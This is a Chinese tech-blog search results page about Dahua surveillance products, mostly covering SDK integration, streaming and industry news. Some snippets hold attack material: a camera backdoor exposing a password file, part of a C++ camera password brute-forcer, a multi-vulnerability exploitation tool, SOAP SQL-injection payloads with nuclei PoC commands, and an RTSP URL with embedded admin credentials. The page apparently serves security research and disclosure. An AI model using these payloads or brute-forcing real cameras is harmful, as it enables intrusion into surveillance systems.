- 综合排序
- 最热优先
- 最新优先
- 来自专栏晨星先生的自留地
大华摄像头backdoor,漏洞?
2017年3月6日该后门发现者已经公布PoC代码,后经过与大华公司沟通,作者已经删除PoC,称2017年4月5日会再次发布。尽管如此,该PoC可能已经小范围流传,并有可能在网络中进行扫描攻击。 00x3 漏洞分析与利用 此处后门有两个地方,其中一处为任何未经授权的人都可以访问和下载路径为 /current_config/passwd 的存储有用户名和密码hash的凭证信息数据库,其中包含有管理员的用户名和密码 Web接口地址为/RPC2_Login,,该接口支持3种不同的客户端类型,其中包括Web3.0,Default(默认),OldDigest。 00x4 漏洞影响 目前大华官方已经公布受影响列表,目前已经确定共有11款型号存在该后门,其他型号大华公司还在进一步确认中。大华公司仍在对此问题进行调查,可能还有其他设备受到影响。 DHI-HCVR51A08HE-S3 DHI-HCVR58A32S-S2
7K31发布于 2018-06-07 - 来自专栏前端之攻略
大华摄像头接入记录
最近做大华摄像头接入,做下记录, 方便以后查看 实时流 Hls格式:http://xxx.xxx.30.65:7086/live/cameraid/1000004%240/substream/2.m3u8 cameraid/1000004%240/substream/1/recordtype/6/totallength/300/begintime/1659888000/endtime/1660060800.m3u8
2K20编辑于 2022-09-26 - 来自专栏TSINGSEE青犀视频
如何将大华设备通过大华SDK接入Demo工具测试视频接入?
EasyCVR是我们接入协议最广泛的视频融合管理平台,除了标准协议国标GB28181、RTSP/Onvif、RTMP等,还支持厂家的私有协议与SDK,如海康Ehome、海康SDK、大华SDK等。 图片在很多的项目现场中,用户通过大华SDK将设备接入EasyCVR,有时候也需要使用大华的SDK Demo工具进行视频接入的测试。 今天我们就来介绍下,如何将大华设备通过大华SDK接入到Demo测试工具。 1)先用管理员权限打开Demo工具,如图:图片图片2)点击AddDevice按钮,配置设备信息,如图:图片图片3)双击该设备,就可以测试视频的播放情况了,如图所示,视频接入正常:图片EasyCVR平台可将接入的流媒体进行处理及分发
1.8K30编辑于 2022-09-19 - 来自专栏AI掘金志
守护生产安全,大华的「解题思路」
近日,在与掘金志的对话中,大华股份智慧制造解决方案总监张卫昌和电力解决方案总监任群分享了大华对于用技术守护安全生产的见解和能力。 四大技术能力的基础上,大华形成了完整的软硬件产品体系。 3、N+1,解决制造业安全痛点 目前,大华在生产安全方面主要形成了“N+1”的解决方案。 可以说,在安全这一核心问题上,大华形成了全栈式的产品和解决方案,满足企业的各类安全需求,并提供全链路赋能。 但这并非大华能力的边界。 “安全和智能是大华发力的重点,同时大华也针对企业的其他需求进行解耦,在保证安全生产的基础上,助力传统制造业企业数字化转型。” “ 这是我们的目标。”张卫昌说道。
46720编辑于 2022-11-08 - 来自专栏嵌入式Linux系统开发
大华2021春招面试题
公司:浙江大华 岗位:嵌入式软件工程师 时间:2021年春招 一面(电话面试25分钟) 1、自我介绍 2、简历中写了做过朱友鹏老师的海思音视频项目,所以问了海思项目。 API的功能; 问我项目用了几个线程;有没有用到锁机制;VLC播放器也就是客户端这边,大概是通过怎么样的方式和过程来连接服务器的; 然后详细问了我项目中用链式队列构建环状buffer的点,问我的思路; 3、 3、数组、链表什么区别?分情况讨论一下它们的效率问题? 4、数据结构学过吗,二叉树学过吗?说一下 5、虚函数解决的是什么问题?析构函数在什么时候需要声明为虚函数?
1.1K20发布于 2021-05-28 - 来自专栏DrugOne
浙大华为团队: 3DSMILES-GPT:基于词元化语言模型的3D分子生成
模型以 Transformer 解码器为骨架,通过将生成二维和三维结构的任务构建为自然语言生成的问题,将原子 2D 结构和 3D 坐标编码为字符,从而有效捕获分子的 2D 和 3D 信息。 此外,为了更好地提取蛋白质口袋信息,3DSMILES-GPT 引入了一个可拆卸蛋白质编码器。 图 1. 3DSMILES-GPT 模型架构 实验结果显示,相较于现有方法,3DSMILES-GPT 在包括生物活性、类药性和可合成性在内的 10 项基准指标中的 8 项上表现出色。 相关成果以 “3DSMILES-GPT: 3D Molecular Pocket-based Generation with Token-only Large Language Model”(《3DSMILES-GPT 论文信息 3DSMILES-GPT: 3D molecular pocket-based generation with token-only large language model Jike Wang
53610编辑于 2025-01-10 - 来自专栏TSINGSEE青犀视频
大华硬盘录像机通过大华SDK接入EasyCVR,为何出现无法在线的情况?
平台可支持多协议、多类型的设备接入,包括国标GB28181、RTSP/Onvif、RTMP协议,以及海康/大华SDK、海康Ehome等,可兼容的设备类型包括IPC、NVR、编码器、移动执法仪、移动单兵、 有用户反馈,EasyCVR平台使用大华SDK的方式可以成功添加大华摄像头,但是添加大华的硬盘录像机则出现了无法在线的情况。针对该情况,我们立即进行了排查分析与解决。 技术人员使用大华SDK DEMO工具测试,发现大华硬盘录像机可以正常接入EasyCVR并且能正常播放视频。 协调用户现场,将设备映射到公网进行测试,排查发现用户使用的大华SDK版本和EasyCVR使用的SDK版本并不一样,所以未能兼容。 大华SDK有很多版本,于是技术人员对该用户的大华SDK版本重新做了兼容后,再接入设备,此时视频已经能正常播放了。近期我们正在对EasyCVR进行新功能的拓展,欢迎大家关注我们的更新。
1.1K20编辑于 2022-09-14 - 来自专栏白帽子安全笔记
大华摄像头暴破工具bruteforceCamera
Part3 手搓工具 直接用C++就地手搓一个,单机初版代码 check_passwords.cpp #include <iostream> #include <vector> #include <curl %u", &start[0], &start[1], &start[2], &start[3]); sscanf(ip_end.c_str(), "%u.%u.%u. ; l <= end[3]; ++l) { char ip[16]; snprintf(ip, sizeof(ip), " ,下载之 https://curl.se/windows/ 然后指定curl库,最终编译命令如下 x86_64-w64-mingw32-g++ -std=c++11 -I C:\Users\user3\ Part3 总结 1.
2.4K10编辑于 2024-10-28 - 来自专栏AI掘金志
「后退」的海康、大华,被低估的「SMB」
大华曾对AI掘金志表示,大华对定制化项目非常克制,未来大华会往后退。 “主动集成我坚定不干,合作伙伴去干,把合作伙伴给培养起来。” 近3万的SKU、细碎的场景、万千的方案,行业碎片化带来的成本,需要规模化来填补,需要标准化平台,提高模块复用率,如此才能降低边际成本。 而在业务层面,他们的“后退”,更多是针对中小企业。 比如做ToB时,挑某个行业的Top3,选一家一起合作。”大华股份白培林(化名)告诉AI掘金志。 合作伙伴借助海康、大华的力量增强客户信服度,海康、大华借助合作伙伴力量持续拓宽覆盖范围。 通过渠道下沉,提炼出终端用户的共性需求优质的解决方案,通过合作伙伴更有效地推广解决方案。 其实海康、大华此前并无大B、小B之分。 SMB诞生于2-3年前的组织架构调整,这一步,由行业属性转变为业务属性,不仅理清了业务脉络,也扩宽了前行航道。
1.1K40编辑于 2022-05-29 - 来自专栏学派客
大华计价秤标定方法(ACS-A)系列
使用说明 1、累计键(下一步) 2、置零键(设置) 3、去皮(切换) 4、初始化密码(597036) 标定方法 打开电子秤上壳,短接SPAN调试开关,开机重量窗显示电压值后,断开调试开关,重量窗显示内码值 (如果第3部加载砝码之后,按累计键不通过的话(按累键会出现滴一声),就要在这里放上秤盘之后输入初始化密码:597036) 按【累计】键进入下一步,【0-9】输入最大量程(15000KG),【去皮】切换最小分度值
1.5K10编辑于 2023-04-07 - 来自专栏kali blog
海康 大华 监控设备RTMP实时推流直播
本文以大华摄像头为例,介绍具体的做法。 使用场景 设备清单 大华摄像头(P20A2-WT)但笔者还是推荐海康。 大华推流地址 rtsp://admin:admin12345==@192.168.123.91/cam/realmonitor? 添加完成后,效果如下: 注意状态 点击播放按钮,效果如下: 这样我们就得到了摄像头的直播地址,如m3u8地址。 类型二 推流直播 同样,我们新建直播,选择推流直播。按要求填写。 如我们得到的直播流地址http://182.168.123.90:10086/hls/cMOAm7USR/playlist.m3u8是无法在公网访问的。 总结 笔者在实际测试中,大华摄像头有很多问题。推流直播一直推不到服务器,只能用拉流直播搞。点击阅读原文,查看实时直播。
2K10编辑于 2025-07-28 - 来自专栏网络安全攻防
【漏洞利用】最新大华综合漏洞利用工具
项目介绍 此项目主要用于在授权情况下对大华系列产品进行漏洞检测 漏洞支持 大华综合漏洞利用工具 收录漏洞如下: 大华DSS数字监控系统attachment_clearTempFile.action注入漏洞 大华DSS数字监控系统远程命令执行漏洞 大华DSS数字监控系统itcBulletin注入漏洞 大华智慧园区综合管理平台信息泄露漏洞 大华智慧园区综合管理平台getNewStaypointDetailQuery 注入漏洞 大华智慧园区综合管理平台clientserver注入 大华DSS user_edit.action信息泄露漏洞 大华智慧园区综合管理平台poi任意文件上传漏洞 大华智慧园区综合管理平台video 任意文件上传漏洞 大华智慧园区综合管理平台emap任意文件上传漏洞 大华智慧园区综合管理平台searchJson注入漏洞 大华DSS数字监控系统attachment_getAttList.action注入漏洞 大华智能物联综合管理平台justForTest用户登录漏洞 功能介绍 支持一键检测模块,选择模块,批量检测模块如下: 大华DSS数字监控系统远程命令执行漏洞 大华智慧园区综合管理平台信息泄露漏洞 大华智能物联综合管理平台
2.5K10编辑于 2024-06-21 - 来自专栏TSINGSEE青犀视频
EasyCVR添加大华设备预置点位置功能实现
大家知道EasyCVR支持云台控制,可以远程控制云台,目前我们在对EasyCVR的设备对接进行新的开发,如果使用大华设备,我们要求能够通过大华的SDK获取所有的预置点。 image.png 在大华文档中查找7代表:“用户参数不合法”(下图)。 image.png 所以大华文档中已经说明参数不合法了,CLIENT_QueryRemotDevState函数有7个参数:分别为登录设备的句柄、查询信息类型、通道号、输出pBuf、缓存长度、输出参数和等待时间
1.1K20发布于 2021-11-23 - 来自专栏EasyNVR
EasyGBS查找大华设备的录像列表时失败
提出问题: EasyGBS查找大华设备的录像列表时页面提示query recordinfo return 400 Bad Request 分析问题: 通过抓包和对比GB28181协议文档时发现发送RecordInfo
1.2K10发布于 2020-04-23 - 来自专栏漏洞复现
大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入
extend>quae divum incedo</extend></car:getNewStaypointDetailQuery></soapenv:Body></soapenv:Envelope>3、 POC基本命令: nuclei.exe -l 网址文件.txt -t POC.yamlid: dahua-getNewStaypointDetailQuery-sqliinfo: name: 由于大华智慧园区综合管理平台 getNewStaypointDetailQuery接口处未对用户的输入进行有效的过滤 author: someone severity: critical description: 由于大华智慧园区综合管理平台
69900编辑于 2024-03-13 - 来自专栏AI掘金志
6 大原因「致堵」,大华如何「治堵」
3. 公共交通分担率低。 4. 法制观念淡薄,交通违法现象严重。 5. 交通设计不合理、路口交通组织混乱。 6. 信号灯配时不合理,缺乏优化。 针对上述六大原因,大华股份智慧交通算法总工梅雨做客雷锋网,详述了大华在城市交通拥堵治理层面的实践、思考。 他提到,全面的精确的交通检测是做好交通治理的前提条件。 3. 公共交通不发达,公共交通分担率低。 公共交通是提高道路资源利用率,缓解交通拥堵的一种方式。 大华股份智慧交通缓堵解决方案 大华提出了AI+大数据的城市拥堵治理解决方案,是以视频检测为核心,全面深入挖掘分析交通问题,并提供全面化和精细化的拥堵治理方案。 大华提供的解决方案完整地体现了交通诊断、交通治理、效果评价一体化。
1.1K10发布于 2020-05-20 - 来自专栏漏洞复现
大华智慧园区综合管理平台 clientServer SQL注入
--type: string--> <arg0>-1) UNION ALL SELECT 1,2,3,4,version()-- -</arg0> <! long--> <arg1>1</arg1> </cli:getGroupInfoListByGroupId> </soapenv:Body> </soapenv:Envelope>3、 POC基本命令: nuclei.exe -l 网址文件.txt -t POC.yamlid: dahua-getNewStaypointDetailQuery-sqliinfo: name: 由于大华智慧园区综合管理平台 clientServer接口处未对用户的输入进行有效的过滤 author: someone severity: critical description: 由于大华智慧园区综合管理平台clientServer --type: string--> <arg0>-1) UNION ALL SELECT 1,2,3,4,version()-- -</arg0> <!
68100编辑于 2024-03-13 - 来自专栏kali blog
Nginx 自建RTMP服务 对海康 大华 直播推流
实验环境 公网服务器 Nginx(为方便演示,以宝塔为例) 大华P20A2-WT 安装Nginx-Rtmp模块 首先登录宝塔后台,安装nginx等三贱客。如果已安装,先做好备份。 ; } location /live { types { application/vnd.apple.mpegurl m3u8 测试 在obs中添加推流地址rtmp://ip:9999/hls/ 推流成功后,我们可以在新建网站的目录下看到生成的m3u8文件。 m3u8测试 访问http://新建站点的域名/live/.m3u8 摄像头推流 注意,由于主流码视频格式比较高,在推流过程中,容易失败。而辅流码比较低,推送正常。
73410编辑于 2025-07-28 - 来自专栏TSINGSEE青犀视频
如何使用大华SDK工具查询和播放设备录像?
EasyCVR视频融合云平台可支持多协议、多类型的设备接入,包括国标GB28181、RTSP/Onvif、RTMP协议,以及海康/大华SDK、海康Ehome等,对外可分发RTSP、RTMP、FLV、HLS 我们在前期的文章和大家介绍过关于如何使用大华SDK测试接入的视频,感兴趣的用户可以翻阅我们往期的文章进行了解。今天我们和大家分享一个技术干货:如何使用大华SDK工具查询和播放设备录像? 操作教程如下:1)打开大华SDK工具,接入通道;2)接入设备后,点击QuertRecord查询设备录像;3)点击之后,选择需要查询的通道号,然后选择查询的时间;4)查询之后,选择此录像段,查看是否可以播放
2.1K20编辑于 2022-09-26 - 来自专栏网络技术联盟站
视频监控领域,大华和海康威视该如何选择?
海康威视和大华的主要区别 尽管海康威视和大华之间存在一些差异,下面列出了一些区别,方便您在考虑以下几点后轻松选择最佳差异: 1. 然而,这两个品牌的大部分产品都使用 1/3 英寸逐行扫描 CMOS 传感器。 海康威视和大华都提供出色的相机镜头选择。海康威视提供 2.8 mm、4 mm、6 mm、8 mm 和 12 mm 镜头,而大华提供 2.8 mm、3.6 mm 和 6 mm 镜头。 3. 重量和尺寸 如果您想在天花板上安装监控摄像头,海康威视和大华都提供轻巧的型号,便于安装。海康威视摄像头尺寸约为4.4×3.2英寸,而大华摄像头尺寸约为4.33×3.19英寸,尺寸相当接近。 海康威视和大华的其他区别 结论 在阅读了这份综合比较并考虑了所有讨论的标准之后,您应该对海康威视和大华所提供的产品有一个很好的了解,虽然它们都是出色的安全摄像头,但它们确实有一些区别。
6.6K10编辑于 2023-03-13
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号